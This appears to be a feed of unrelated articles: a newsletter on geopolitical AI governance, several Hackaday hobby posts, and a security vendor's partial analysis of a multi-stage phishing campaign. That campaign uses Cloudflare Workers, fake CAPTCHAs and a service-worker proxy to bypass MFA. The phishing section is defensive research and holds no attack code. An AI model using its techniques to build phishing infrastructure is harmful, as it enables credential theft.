THERE WAS NEVER A WESTERN CONSENSUS for AI rule-making. Back in 2023-2024, the European Commission and former White House administration criss-crossed the globe to champion their respective visions of what AI oversight looked like. Washington preferred voluntary commitments. Brussels went all-in on its AI Act.

That basic tension is still there. Arguably, it's more pronounced in 2026. Where we are now (at least in terms of the European Union, US and China) is three competing sets of rules with no realistic "translation layer" to connect them. If the Bletchley Park Declaration, albeit voluntary, was about setting aside national interests to promote AI safety at a global level, then the current landscape is defined by fragmented national/regional rule-setting designed to favor individual strategic interests.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in July:
— An inside look at how regulators and companies view digital rules differently; Why Europe's digital sovereignty ambitions are missing a critical element; Almost half of Americans use AI chatbots at work. More here.
— Platform governance has entered a new phase: redesigning social media; The United Nations' push into AI misses where the real decisions are made; People aren't relying on chatbots to access news. More here.
— An ongoing focus on digital foreign interference misses where the next online threats are coming from; How the US and China laid out AI governance plans that left everyone else in their wake; More than half of Americans now favor a social media ban for kids. More here.
— Brussels and Washington are a lot closer on digital competition than you may think; The United Kingdom again shows why it's a second-tier digital nation; Data to show why China and the US are so far ahead on AI. More here.

The US' subtle pivot is demonstrable of how things have changed. During Joe Biden's administration, Washington laid out plans (via White House Executive Order) that made clear US efforts to remain the global leader on AI. But it also included some safety provisions, including watermarking for AI content and protecting consumers from AI harm, that positioned Biden in a co-regulatory relationship with AI firms.

That Biden-era Executive Order was quickly scrapped. In its place, Donald Trump's administration initially doubled down on removing all forms of AI oversight in the name of promoting US dominance. That framing, however, has shifted in 2026 as US officials respond to growing national security concerns around both how powerful the latest AI models have become and how quickly China's open-source rivals have matched US tech firms' proprietary systems. Ironically, in imposing export controls on Anthropic's most-advanced model, the laissez-faire Trump Administration had more direct intervention than the Biden Administration — and its favoring of some regulation — ever did.

For Europe, there also has been an about-turn on what had been Brussels' clear policymaking objective: comprehensive AI rules.

It's not that the EU isn't still committed to its AI Act. Those rules — like everything in Brussels — will stick around no matter what. But the recent AI Omnibus delayed some of the regulatory deadlines associated with high-risk AI use cases. It also introduced a ban on AI tools that created non-consensual explicit images/deepfake content, in part to placate anger within the European Parliament for the wider delay in the comprehensive AI rulebook.

More importantly, Europe shifted gears from using regulation to police AI to passing rules to jumpstart AI-enabled economic growth. The bloc's recent European Technology Sovereignty Package is less about AI enforcement, and more about using public funds to build EU digital infrastructure and compute power to ward off the "kill switch" fear associated with the bloc's current reliance on US tech providers.

This change put Brussels directly at odds with Washington's "AI dominance" strategy in a way that escalates the previous tensions between the US and EU on who should set global AI standards.

I won't pretend to be an expert in China's domestic AI rulebook (more on that here, here and here). But its international priorities now match those of Beijing's similar approach to digital diplomacy: use its convening, financial and standards-setting muscle to nudge other (Global Majority) countries to back its more authoritarian take on the emerging technology.

Its recent creation of the so-called World Artificial Intelligence Cooperation Organization, based in Shanghai, is this "Belt and Road" philosophy tilted toward the AI age. It's nominally multilateral, with 28 countries joining the organization, and includes language around openness, equity and inclusiveness. But the geopolitical aim is clear: to export a China-focused regulatory and governance model for AI to position Beijing (and its world view) at the center of the global AI rule-making discussion.


Chart of the Week:


Total combined investment between 2021-2024 for countries worldwide (with a minimum investment of $1 billion).

The scale of accumulated US and Chinese investment over the time period explains why AI rulemaking for those countries is now inseparable from states’ attempts to protect existing industrial advantages for strategic national gain.
The global battle for AI, revisitedSource: The 2025 AI Index Report; Visual Capitalist


Yes to regulation. Just make it my regulation.


THIS IS WHERE THINGS REALLY HAVE BECOME complex compared to where we stood in 2023/24. Back then, the battle centered on disputes about what regulation should do and who should be policed. Many of the largest US tech firms — the ones with the most advanced large language models — called for regulatory limits so only their systems could be used. That would be based on voluntary commitments to comply with oversight from a number of national AI safety institutes that had begun to sprout up.

The fear was that the alternative — framed via the expansion of open-source alternatives — would lead to short-term (AI's creation of bioweapons) and existential (read: Skynet) risks that were just too big to not be enforced by strict rules.

That dynamic continues in 2026, but with an even greater corporate bent. The likes of Google's DeepMind now actively call for greater regulation — albeit via an industry-funded self-regulatory agency akin to the US Financial Industry Regulatory Authority. OpenAI's Sam Altman has similarly suggested Washington lead efforts to create international certificates/standards for the latest large language models, again in a model that would massively favor that tech giant over smaller rivals.

Now, the regulatory discussion has become a geopolitical contest where each country's/region's approach and strategy is framed around promoting separate strategic interests. Regulation has become industrial policy by another name.

In the US, AI rules have now become OK, especially in light of the recent hacking efforts by OpenAI's systems and rumors about what Anthropic's latest models can do. Yet these proposals are inevitably self-serving. Companies propose oversight that will likely entrench their dominance by raising barriers around who can build such advanced AI systems. Call it regulatory capture framed as public safety.

The Chinese have thrown their full weight behind open source. In part, that is a pragmatic response to increasing US efforts to stop the world's second largest economy from accessing AI infrastructure like high-end semiconductors. But it's also a strategic play to reduce Beijing's (and other capitals') reliance on US proprietary models when much of the world's willingness to trust Washington has been diminished.

It helps that Chinese open source models are now mostly on par with those from Anthropic, Google and OpenAI. It also helps to position Beijing as a willing partner, see above section, with national capitals across the Global Majority which feel shut out from the conversations going on in Brussels and Washington, respectively. The fact that Western companies are now embracing such Chinese open source models is a sign that Beijing's tactics are bearing fruit, even across the US and Europe.

Europe, the OG of digital regulation, has been caught flat-footed by the "open versus closed" battle between the US and China. Part of that can be explained by the 27-country bloc's fixation on its digital sovereignty agenda that now includes pumping public money into "Made In Europe" digital infrastructure. That goal has been championed by the Continent's legacy industries.

The recently-published European Tech Sovereignty Package didn't go as far as many of these firms would have liked in terms of kicking US tech giants out of the bloc's digital infrastructure. It also embraced open source as a means to both reduce the EU's reliance on US tech providers and jumpstart AI-enabled economic growth, which — at least on paper — sounded awfully similar to what China is now promoting.

But Europe's rule-making, like that of the US and China, is now overwhelmingly positioned to support the Continent's industrial interests. Two years ago, that conversation was squarely focused on policing the emerging technology for public good.


The combination of lobbying and geopolitics


COMPANIES PUSHING THEIR CORPORATE INTERESTS is not new. And even in 2023/24, many of the arguments about whether regulation should favor either open or closed AI models were more akin to a lobbying fight between rival industrial camps.

Yet in 2026, the line between corporate lobbying and countries' geopolitical strategies has blurred into insignificance. With so much on the line when it comes to AI (in terms of economic growth and national security, see below), officials are now more willing to actively promote specific companies — both at home and abroad — to ensure their vision of the AI future comes to pass.

I've already outlined some of this in the section above. But when Anthropic's chief executive outlines his concerns about the Chinese Communist Party developing AI models that are "more powerful than those built by the US, and use them to achieve permanent military superiority," the distinction between what are corporate and national priorities becomes hard to disentangle.

There is a reason why some within US tech circles now refer to Chinese rival AI models as "Communist AI," and it's not because of legitimate concerns about how the authoritarian regime could potentially use such advanced technologies. It plays directly into Washington's mounting fears of Beijing's technological prowess, and turns corporate concerns about being supplanted by cheaper, Chinese open source competitors into national security concerns that, potentially, may lead to action by the US Congress or White House.

It's not like the Chinese are not doing something similar with their embrace of open source. They decided that competing head-on with the likes of OpenAI and Google was a mug's game. A lack of access to high-end Nvidia chips and semiconductor technology from the likes of the Netherlands' ASML also forced their hand. But Beijing's interests now align with Chinese companies' interests: build globally-competitive open-source models that reduce the ability of US rivals to sell their wares to would-be clients worldwide.

The European lobbying is equally grounded in policymaking priorities, albeit Brussels is somewhat more navel-gazing than either Washington and Beijing. EU companies have successfully (and possibly legitimately) framed the bloc's ongoing use of US technology as a strategic dependency that now must end. Europe's willingness to use public funds to build up its own digital infrastructure — often via contracts to these very same European companies — brings those corporate interests and policymaking goals full circle.

What no one (or, almost no one) is willing to admit in the EU is that, currently and likely for the foreseeable future, European alternatives are not yet ready to compete, at scale, with incumbent US tech providers. Many in Brussels know that reality. Few are willing to say it out loud.


New dynamic: AI = national security


WHEN I REPORTED THE POLITICO ARTICLE in 2023/24, national security was an also-ran in the AI governance conversation. There were concerns around how the technology would be used in autonomous weapons. But questions around AI safety and "trustworthiness" were central to global AI policymaking discussions.

How much can change in two years.

Alongside a focus on AI-enabled economic growth, the merging of artificial intelligence with national security priorities has become the only digital policymaking game in town. Well, that and kids' social media bans. Many of the AI safety institutes created in the wake of the Bletchley Park Declaration even renamed themselves "security" institutes (looking at you, United Kingdom.)

There are good reasons for this shift. The latest AI models are breaking things that many thought unthinkable, even a year ago. The use of AI in warfare is now worryingly routine.

Sign up for Digital Politics


Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.


No spam. Unsubscribe anytime.

The ability of governments (aka Washington) to impose export bans on advanced large language models, as well as stop other countries from accessing high-end chips, is now accepted, even if opposed by the likes of China that face such restrictions. There are some in the US who now even want to ban Chinese open-source models from entering the country.

Where once AI governance was framed through the prismof traditional digital regulation, it is now conducted via such export controls, model restrictions and investment screenings directly in the wheelhouse of national security.

In truth, national security has now consumed the other areas of the global AI race that were so prominent in 2023/24. Rules are set to meet national security objectives. Regulation is constructed to promote national strategic advantages. Corporate lobbying is positioned through a geopolitical lens, and not as one that pits companies and governments on separate sides of the table.

That is the biggest fundamental shift — and speaks to the geopolitical nature of the global AI race that, while present in 2023/24, has been turned up to 11 over two years later.

In 2024, I asked who would control AI. The answer in 2026 is that control itself has become the objective. Each jurisdiction is building the AI infrastructure, the regulatory framework and the corporate alliances to try to control the emerging technology, and not be controlled by it.



digitalpolitics.co/global-ai-g…


Could Camera Hardware Be The Physical Equivalent to USB-C?


The media in this post is not displayed to visitors. To view it, please log in.

[Mansour] presents an interesting idea in his essay A Common Thread — just as USB-C has become the “One Connector To Rule Them All” in the world of electronics, so too should his projects have a unified physical connection layer. A common thread, if you will.

Specifically, the 1/4″-20 UNC connector that was already on all his camera equipment. Unifying his stuff around that connector wasn’t a bolt from the blue brainwave. By the sounds of it, the idea evolved over time and only became intentional after he’d already started using it.

There’s something to be said for it, though. One thing is the convenience of knowing your various bits and bobs are going to fit together like they were made with LEGO. Another is taking away a whole set of decisions in the design process: it’s going to have a 1/4″-20 UNC fitting, so [Mansour] needs only decide if its going to be tapped into the material or if he’s using an inset or captive bolt.

It isn’t like a 1/4″ bolt is going to introduce a weak point in most things we build — with good hardware it can take a ton or more. On the other hand it’s not exactly resilient to torque, but [Mansour]’s camera bag had the answer to that, too: spring loaded locator pins that drop into holes on the female side to take up the torque. In the photography world, these are AARI pins. To us they just seem like a good idea.

Maybe you don’t see the point of avoiding redesigning the wheel every time for custom mounts and brackets. After all, that lets you come up the the ideal solution every time. On the other hand, [Mansour] has both simplified his design process and made decades worth of camera-holding objects — everything from tripods to stabilizing gimbals — accessible to all his stuff. It’s an interesting idea, and his full blog post is worth a read, even if it’s not likely the EU is going to force its adoption like it did USB-C.


hackaday.com/2026/08/05/could-…


Train Simulator Controller: July 2026 Progress Roundup


The media in this post is not displayed to visitors. To view it, please log in.

For the past three years [Christopher Mitchell] has been working on his replica of a British Rail Class 800 control cab for a physical train simulator, with the July blog update providing many details on the progress.

The Class 800 series of trains is relatively new, having first entered service in the UK in 2017 on the Great Western Railway (GWR). Designed and built by Hitachi as part of their modular AT300 product series, they come in both purely electrical and diesel-electric hybrid configurations to deal with non-electrified rail sections.
British Rail Class 800 in service with LNER in 2023. (Credit: Foulger Rail Photos, Wikimedia)British Rail Class 800 in service with LNER in 2023. (Credit: Foulger Rail Photos, Wikimedia)
Replicating the experience of driving a train is always a trade-off between what one would like and what is practical or affordable. With only a corner of his apartment to work with, [Christopher] has opted to focus on the instruments and controls in the cab, using real components where possible or building replicas for the remainder.

This entire control panel is to be used with simulators like Train Simulator and Train Sim World, using their controller APIs to both control the in-game train as well as to get feedback to be displayed on the real instruments and the various LEDs, such as those that indicate the state of the external lights. These are all controlled internally via a CAN bus, as is typical.

These instruments include genuine AWS sunflowers, part of the safety system that ensures that a driver has acknowledged a non-clear signal along the track. It’s another nice touch to a control cab simulation that’s shaping up to be rather close to the real deal.

Even if for the average person something like a Densha de Go! copy and associated controllers will likely suffice, there’s a lot to be said for having something closely resembling the real deal for a realistic game, whether it’s a train, car or airplane controller and associated instrumentation.


hackaday.com/2026/08/05/train-…


A Full Motion Video Codec For the Atari ST


The media in this post is not displayed to visitors. To view it, please log in.

Who says an old dog can’t do new tricks? The Atari ST has got to qualify as an “old dog” 41 years after launch, and if playing Full Motion Video (FMV) cutscenes– from DOS games of a decade later– doesn’t count as a new trick, we’re not sure what does. In this case, [Jonas Eschenburg] is the trainer and his fascinating write-up lets you know exactly how he did it.

Unlike the contemporary and pricier Amiga, Atari’s 68000-based home computer didn’t have any fancy graphics chips; everything has to go through the Motorolla CPU at a blistering 8MHz. Just porting classic DOS games like [Jonas Eschenburg] is doing with Command and Conquer— a title 10 years newer than the ST– is an amazing tour de force. Bringing the cutscenes along for the ride is just bonus, but what a bonus it is.

Granted, [Jonas] has to work within the Atari’s limitations, so it doesn’t quite look the same. The biggest limitation is of course the 16 colour planar graphics on the Atari, compared with 256 colours of chunky goodness that VGA offered. [Jonas] admits that getting good palettes to minimize artifacting is a challenge. Interestingly he’s not showing quite so many blocking artifacts we would expect from the technique he is using: to take advantage of how the ST’s memory is laid out, he’s using a codebook-based codec that splits the image into easily-addressable blocks. Both the palette and the codebook must update continuously as the film plays but that’s still easier on the antique hardware than streaming raw pixel data, which you cannot do. The whole article is absolutely worth a read, and the demo videos generously sprinkled through it are worth a look, too. We’ve included a demo of C&C‘s intro below. If you’re itching to play, the port is on Itch.io.

Speaking of DOS games, did you know the Atari ST can run doom? Multiple versions, even.

youtube.com/embed/PhOa3KCE_nM?…


hackaday.com/2026/08/04/a-full…


Polystyrene Foam can be Gasoline With Some Help


The media in this post is not displayed to visitors. To view it, please log in.

Styrofoam – or closed-cell extruded polystyrene (XPS) foam if you want to be precise – is one of those materials that is both super versatile for packaging and insulation, but also a menace when it comes to disposal, even if you ignore that the monomer styrene (C8H8) is a known mutagenic toxin. One of the more creative ways to deal with the metric tons of polystyrene waste generated each year is to turn it into gasoline, as demonstrated by [Lowered Expectations] in a recent video.

With polystyrene being just another hydrocarbon polymer, the idea of turning these polymers into the mixture of hydrocarbon chains we call ‘gasoline’ isn’t so crazy. The problem is mostly doing it in a way that makes some economic sense and doesn’t risk turning your domicile into a hazmat risk site or threaten the health of you, your loved ones and the neighborhood.

The method demonstrated in the video uses fairly basic methods involving pyrolysis and distillation. The first step involves dissolving the polystyrene in gasoline that was previously recovered from stale gasoline, which is another dangerously fun science experiment. This creates a thick slurry that’s then put into the distillation flask for the heating phase.

After testing the distillates for spark ignition the useful distillates were combined with fuel stabilizer added. Before tossing this into a gasoline engine tank for further testing, the concerns of auto-polymerization of styrene monomers are addressed, which requires special inhibiters.

Although this mixture runs a gasoline generator just fine, a borescope inspection of the cylinders showed a build-up of a shiny, gummy residue. There’s also the issue that this mixture contains styrene monomers, which are as noted very unhealthy to breathe in from either the fuel or any remaining monomers in the exhaust. Definitely not something to try at home, basically.

youtube.com/embed/OLrmRsavJHU?…


hackaday.com/2026/08/04/polyst…


Tearing Down Aircraft Weather Radar Avionics


The media in this post is not displayed to visitors. To view it, please log in.

If you’re flying high in the sky, it’s useful to know if there’s turbulence, heavy rain, or other nasty weather ahead. Onboard weather radar is a useful tool that pilots use to scope out conditions ahead. [Thomas Scherrer] came into possession of a weather radar display from a vintage aircraft, and decided to tear it apart for our viewing pleasure.

The unit in question is a Bendix PPI-1 plan position indicator. This particular 1971 example was scored from a McDonnell-Douglas DC9. [Thomas] only has the display itself, not the radar that would feed it or the power supply to turn it on. Still, even just the readout unit is super interesting to look inside. Right off the bat, there’s a neat dimming filter on the front, and the case itself is really beautifully designed for service. The design is very much of its time, full of neat wire harnesses and chunky through-hole components. There are some neat surprises inside, too, like an interesting device shaped like a triangular prism whose purpose we won’t spoil here.

If you’re wondering what one of these units looks like in action, you can see such an example on YouTube. The display basically lights up in areas where there were stronger radar returns indicating weather to be avoided.

We love radars around these parts, and we feature them all the time. Video after the break.

youtube.com/embed/Qjr3npMAmnY?…


hackaday.com/2026/08/04/tearin…


Strengthening 3D Prints with a Carbon-Fiber Epidermis


The media in this post is not displayed to visitors. To view it, please log in.

A man's hands are shown holding a broken 3D-printed hook. The hook has a loop and hook, in a number 9-shape. The hook portion has broken, exposing carbon fibers.

As strong and light as carbon fiber-epoxy composites are, the same can’t always be said of carbon-fiber reinforced 3D printer filaments. Of those that do improve over stock filament, the best performance comes from long, continuous strands, but the printers that can embed these are quite expensive. [MagicLAG], looking for a cheaper method, made something even stronger: prints reinforced with subsurface carbon-fiber cloth.

They tried a few other methods first, including pausing the print and manually embedding carbon fiber strands, ironing strands into the finished part, and ironing carbon fiber cloth into the bottom layer. For the main method, though, he printed the test part in three pieces: a core part, and two outer shell layers. Between the core and the shell is a small gap, into which carbon-fiber cloth can be epoxied. Under good conditions (not using quick-setting epoxy), this mostly preserves the outer surface and dimensional accuracy.

To test the various strengthening methods, [MagicLAG] printed hooks and tensioned them on a load cell until failure. None of the methods using single-stranded fiber showed any improvement; the fiber simply bent and let the surrounding plastic break. As a control for the epidermal cloth parts, they printed shells and cores and epoxied them together. These controls performed better than the standard parts, but not nearly as well as the carbon-fiber cloth composites. With only a few layers of cloth, these more than tripled the yield strength of the basic hook.

If you’d rather use a carbon-fiber filament, the type of plastic matters; carbon fiber makes PLA, at least, weaker. Regardless of form, some caution is called for whenever handling carbon fiber, since it seems to show some asbestos-like effects.

youtube.com/embed/-2GHCITel-8?…


hackaday.com/2026/08/04/streng…


At Last! CP/M for Protected Mode


The media in this post is not displayed to visitors. To view it, please log in.

If you used a serious computer pre-IBM PC, there was a fair chance its operating system was CP/M. CP/M was a staple among 8080 and Z80 computers and while there were other versions, we’ll always associate CP/M with the Z-80. There was a CP/M made for the PC which used an 8088 (a hybrid 8-bit bus with a 16-bit 8086 core), but it was overwhelmed by MSDOS. However, there was another interesting version made for the 68000, and now [johnsonjh] has ported that over to create an early version of CP/M for 80386 protected mode.

The Z-80 only had a 16-bit address bus, so it could only handle 64K of memory. It was common to “bank switch” some memory, and CP/M Plus could be made to understand that (for example, you might have 32K of common memory and three banks of 32K memory; you could address one bank at a time). However, the 386 had a full-blown memory management unit that could remap physical 4K memory pages to anywhere in a program’s virtual address space.

Ordinary CP/M couldn’t handle that, but the Motorola 68000 had a similar page management model, so it makes sense it might be easier to port CP/M-68K to the 80386 than starting from the original, even though the instruction set for the Z-80 is conceptually more similar to the 80386.

What can you do with it? We don’t know. Presumably, it will allow you to use lots of memory. Historically, CP/M software from one variant would not run on another, so you’ll have to build anything you want to use. Of course, the real killer for lots of CP/M memory was multitasking, but that takes MP/M, and only about half of that is currently working. But we won’t be surprised to see it completed soon.

While CP/M skills won’t land you many jobs these days, it is a pretty good way to get mentioned on Hackaday.


hackaday.com/2026/08/04/at-las…


BornHack Radio 102.8 FM, Playing Radio At A Hacker Camp


The media in this post is not displayed to visitors. To view it, please log in.

Over the years I have been to many hacker camps and done a lot of very cool things, but BornHack 2026 brought me something entirely new: Radio. By which I don’t mean radio in terms of amateur radio, LoRa, or whatever, but Radio. Broadcast radio, because the camp had a special event FM radio station for the first time. And because in a previous life I spent an inordinate amount of time in my university’s student radio station and have the Radio Voice to prove it, I was totally there for it.
A view of a tent shelter in bright sunlight with studio equipment visible on a table in it. There's a sign: "BornHack FM".The BornHack Radio nerve centre.
For a hacker camp, one of the special things about BornHack Radio was unexpected, that it was entirely analogue. No online streams, the only broadcast was over the air, 5 watts ERP from a vertical antenna stuck on a mast at the highest point of the Hylkedam scout camp site. I don’t know whether any of the residents of the isle of Funen listened, or what they made of it, but it certainly reached as far as the two closest towns.

The other unexpected feature of the station was that it had no music licensing. Personally I viewed this as an asset, because it forced the programming to be hacker-focused rather than suit the musical tastes of whichever people are enthusiastic enough to be DJs. I sincerely hope they don’t get a music licence at future events, speech-only gives it a special quality.

The studio for an analogue station like this one can be surprisingly simple, in that it’s a mixing desk to bring all the different microphones and other inputs together and set the levels, and not a lot else. the whole thing was in a Coleman shelter on the main drag through the camp, so as studios go it could have been quieter. Programming varied from talk shows through interview shows, a live feed from the speaker tent — is this the first ever Hacker Jeopardy broadcast? — and a beautifully done robotic numbers station which I suspect may also have been part of one of the on-camp games.

I brought two shows to the airwaves, both recorded, the first of which was a BornHack take on the Hackaday Podcast format, and the second a half-hour roving interview show. I believe I may be the first person ever to live-commentate a pixelflood screen in the style of Formula One coverage.

The thing that struck me most in my first foray into radio journalism was how straightforward it was. Wander the camp with microphone (complete with fluffy windshield and 3D-printed Hackaday cube), drop the results into Audacity, and a remarkably straightforward editing process compared to video. Last time I did this it involved 1/4″ tape and a razor blade.

So that was BornHack Radio, a new experience at a hacker camp both for those of us who ventured forth on the airwaves, and I hope also for the listeners. A format in which the live shows disappeared into the aether rather than having an online afterlife gave the whole thing a freedom rarely found in 2026. I really hope this isn’t the last time I break out the fluffy microphone at a hacker camp.

Thanks to [⁨Morel Sourvalley⁩] for the images.


hackaday.com/2026/08/04/bornha…


Un Ordinateur Pour Le Minitel-1 (A Computer For The Minitel-1)


The media in this post is not displayed to visitors. To view it, please log in.

In the 1980s, France was the stage for one of the boldest public computing projects of the era. Minitel was the French take on viewdata, and instead of making it an expensive and unattainable luxury, they made the terminals universally available. Many Minitel services cost extra to use, but despite this it was a runaway success that lingered on into the 21st century.

The ubiquitous terminals are now surplus to requirements, but that’s not to say they are useless. [MemoireMorte] has proved this with the Memo-1, a 6502-based computer designed to plug into a Minitel-1 terminal. It’s just the accessory your Minitel needs!

Hardware wise it’s a relatively conventional device with the usual RAM, ROM, and BASIC. There’s an expansion port, and a 6522 to provide a couple of Atari joystick ports. The serial port uses a a 6551 ACIA rather than the more usual W65C51 because of an incompatibility between the latter chip and the Minitel-1.

We like this computer, not because of novelty, after all it’s hardly the first 6502 we’ve seen, but because of its use of the Minitel terminal. These devices are magnificent, and deserve more love. We subjected another terminal to a teardown a year or two ago.


hackaday.com/2026/08/04/un-ord…


Road Trains Roam The Backroads of Australia


The media in this post is not displayed to visitors. To view it, please log in.

Trains and the railways they run on are a great way to move lots of stuff, or lots of people, a long way. Steel wheels on steel rail can shift great loads at good speeds and railways remain a backbone of logistics for this very reason. The only problem is that they require a great deal of initial investment to build and plenty of maintenance to keep them functional over time.

These concerns can make a railway a difficult proposition when it comes to getting large amounts of goods in and out of remote areas. It’s a problem that Australia faces, with settlements far off the beaten track that are nevertheless in need of high-throughput freight connections. And if you can’t go rail, you go road… in a big way.

Heavy Haulers


The simple fact of Australia’s geography is that there are towns and cities separated from each other by thousands upon thousands of kilometers. It’s often desirable to move goods to and from these places, along with remote mines and farms buried in the country’s vast, dry interior. However, it has never been practical to link all these disparate locales by permanent railways. The distances have always been too vast, and the freight volumes not quite high enough to justify the expense. At the same time, relying on trucks alone was seldom economically convenient.
An MGM Kenworth C509 pulling a 60-meter A-quad configuration in Western Australia. Credit: SquiddyFish, CC BY 4.0
The solution was straightforward, and surprisingly simple—bigger trucks hauling more trailers. In the local parlance, a road train consists of a prime mover (or tractor) that hauls two or more trailers.

The official definition from the Heavy Vehicle National Law excludes the standard B-Double configuration that is regularly seen across the country. Instead, a road train could be a longer A-Double configuration, or even one of a variety of combinations involving three or four trailers being hauled by a single prime mover, like a B-Triple or a BAB Quad. The A and B designations refer to the type of coupling used. A-type refers to drawbar-based couplings, while B-types are fifth-wheel or turntable-type couplings. A truck or road train setup is thus referred to by the couplings that make up the consist.
A four-trailer BAB-Quad road train in Marla, South Australia. Credit: Caroline Jones, CC0 We count 12 shipping containers.
The longest road train configurations of three or four trailers typically range up to 53.5 meters in length and over 135 tons in weight, per the rules laid down by the National Heavy Vehicle Regulator, though even longer configurations are used in some specially-permitted or off-highway roles in mining or agricultural industries.

These long consists are typically pulled by large prime movers with anywhere from 500 to 700 horsepower and 1500 to 2000 pound-feet of torque. Ultimately, it doesn’t actually take a grand amount of power to get even a very heavy load moving; it’s the torque that helps the most, anyway. The bigger challenge is actually stopping, and that takes great care and makes road trains unsuitable for crowded roads. As far as applications go, road trains are used for hauling all sorts of goods and material across Australia. Common loads include livestock, ores, and general freight, as well as long chains of tankers for hauling bulk amounts of fuel.
Various road train configurations, as laid out by the Heavy Vehicle National Law. Consists are referred to by the manner in which trailers are coupled together. Credit: NHVR.gov.au
Road trains also wear large signs front and back to indicate their status. Typically, this consists of large black text on a yellow background reading “ROAD TRAIN” or “LONG VEHICLE” depending on the jurisdiction. Classified nationally as heavy vehicles, road trains are limited to speeds of 100 km/h, except in NSW and Queensland where they are limited to just 90 km/h (except for B-Triples in the latter state). These regulations in part help to ensure that motorists know what they’re dealing with when coming across a large road train on the open roads in the Australian outback. It can take quite a long time to pass a road train at legal highway speeds, so motorists need to be aware when attempting such a manuever.

Largely by virtue of their length alone, road trains are restricted in where they may or may not travel. For example, in South Australia, B-triples that measure up to 35 meters long are only allowed to travel via specific routes to industrial and import/export hubs, to avoid them causing chaos in built-up metropolitan areas. Similar rules exist in other states and territories, too, where triple and quad configurations are allowed to operate at all. Notably, Darwin, capital of the Northern Territory, is unique in allowing triple and quad roadtrain consists to operate within a kilometer of the central business district. The city’s limited size and density, with a population of just 140,000, means that this isn’t the same practical disaster that it would be in other major metropolitan centres around the nation.
A four-trailer road train hauling fuel near Broome, Western Australia. Credit: W. Bulach, CC BY-SA 4.0
The “road train” terminology does have some purchase in other parts of the world. However, it generally refers to B-Doubles or other smaller consists compared to the Australian norm, where it only refers to the very largest configurations.

For example, countries like Spain, Sweden and Germany allow truck-trailer combinations up to 25 meters long, while trucks in the United States are largely limited to two trailer configurations up to 19 meters maximum. In these other jurisdictions, there is seldom the same economic incentive to haul excessively long trailer loads to maximise the efficiency of freighting to and from far-flung destinations. Greater traffic and other road network considerations also limit the practicality of extra-long consists in more densely populated regions.

However, in the outback of Australia, where the roads are so empty and the distances so great, the three- or four-trailer road train starts to make a whole lot more sense. Road trains aren’t going anywhere as long as Australia maintains its low population density and needs to haul goods to and from distant rural and regional areas. If you go far enough beyond the cities, or to the right freight terminals, you might just see some of these rolling behemoths ploughing their way across the landscape!


hackaday.com/2026/08/04/road-t…


How legitimate cloud platforms enable phishers to bypass MFA


The media in this post is not displayed to visitors. To view it, please log in.

Threat actors are increasingly exploiting legitimate cloud services to evade detection and streamline the deployment of their scam infrastructure. Cloud hosting services and decentralized networks have become primary platforms for hosting phishing pages and sites. Throughout 2025 and 2026, we have observed phishing operators steadily migrate toward platforms like Cloudflare Workers, Vercel, Netlify, GitHub Pages, and IPFS. This post analyzes the mechanics of a real-life adversary-in-the-middle (AitM) attack in a cloud environment and presents detailed statistics on the platforms and domains phishers abuse most frequently.

The cloud as a safe haven for phishers


Threat actors select platform-as-a-service (PaaS) offerings and distributed cloud environments to host phishing sites for much the same reasons legitimate software developers do:

  • Inherent trust and reputation. Phishing pages hosted on reputable platforms appear trustworthy, reducing suspicion among potential victims.
  • Most platforms offer generous free-tier developer plans. The onboarding process takes minutes and rarely requires Know Your Customer (KYC) identity verification. This enables a single operator to create hundreds of malicious accounts.
  • Evasion and anonymity. Attackers leverage native security features to obscure their true origin server IP address behind a CDN, which complicates detection for security vendors.

Additionally, these platforms allocate shared subdomains hosting millions of legitimate projects and websites. Security teams cannot simply block the parent domain or its subdomains without inflicting collateral damage on bona fide users – a limitation that malicious actors take advantage of. To counter this tactic, security vendors must advance content-based analysis methodologies.

Multi-stage AitM attack


Consider a modern AitM phishing campaign that leverages Cloudflare Workers, a widely adopted cloud platform. The attackers execute the operation through multiple HTML pages distributed across a compromised website and the cloud platform. Each page serves a specific function: harvesting target email addresses, initializing the reverse-proxy infrastructure, or spoofing the login form to capture multi-factor authentication (MFA) sessions.

Stage 1. Contact harvesting and network monitoring evasion


The attack typically begins with a phishing email that uses a plausible pretext – such as a request from a coworker to review documents – to entice the target into clicking a malicious link.

Upon clicking the link, the user is redirected to a fake CAPTCHA landing page hosted on a compromised legitimate website. This specific campaign used the https://t[REDACTED]e.com website, but any other variations are possible. In this scenario, the compromised page served as a disposable relay — vendor detection mechanisms typically block phishing links delivered directly via email much faster — to prevent the early discovery of the core phishing content hosted on Cloudflare.

If the user entered their email address and clicked Continue, the pseudo-CAPTCHA marked them as a human user and initiated a redirect. The primary objective of this stage is to harvest target email addresses, filter out bots, and route legitimate users to a subdomain of workers.dev. Such subdomains are generated automatically and free of charge by Cloudflare Workers. The victim’s email address was embedded in the URL hash (the part of the URL following the # character), allowing the page at [REDACTED].workers.dev to extract the email without issuing a request to the attacker’s server, thereby avoiding detection.


Stage 2. Initializing a transparent proxy


The user’s browser then loaded a [REDACTED].workers.dev page with #user@business.com at the end of the URL. At this point, the page presented the victim with a genuine CAPTCHA challenge. This step ensured that an actual user was interacting with the page rather than a security sandbox.

Another CAPTCHA, this time a legitimate one
Another CAPTCHA, this time a legitimate one

Once the user successfully completed the challenge, a service worker was registered in their browser. This is a special JavaScript file capable of running in the background and intercepting all network requests generated by the current tab. As this type of script was designed as a core component of progressive web apps (PWAs) to optimize load times and support offline functionality, browsers treat service workers as standard site feature and execute them without prompting for user consent as long as the website uses an HTTPS connection.

The attackers leveraged the service worker to deploy Ultraviolet, a legitimate open-source web proxy library, to dynamically rewrite all links and forms on the page. This forced every outgoing request – including those for Microsoft login credentials – to route through the attackers’ server rather than directly to the legitimate services.

Immediately upon loading, the page extracted the victim’s email address from the URL hash and stored it in the browser’s sessionStorage property so it would not be overwritten when the CAPTCHA loaded. This step also allowed the script to pre-fill the username field in the form automatically. A pre-populated login field enhanced the page’s credibility and bolstered user trust. Once the CAPTCHA was passed, the malicious script constructed a redirect URL for the third stage, appending the email retrieved from sessionStorage back to the hash. By passing the email via the URL hash across three consecutive stages, the attackers successfully kept it hidden from network attack detection systems.

Registering a service worker to intercept traffic
Registering a service worker to intercept traffic

Establishing a transparent proxy via an external library
Establishing a transparent proxy via an external library

Stage 3. Session hijacking and browser window spoofing


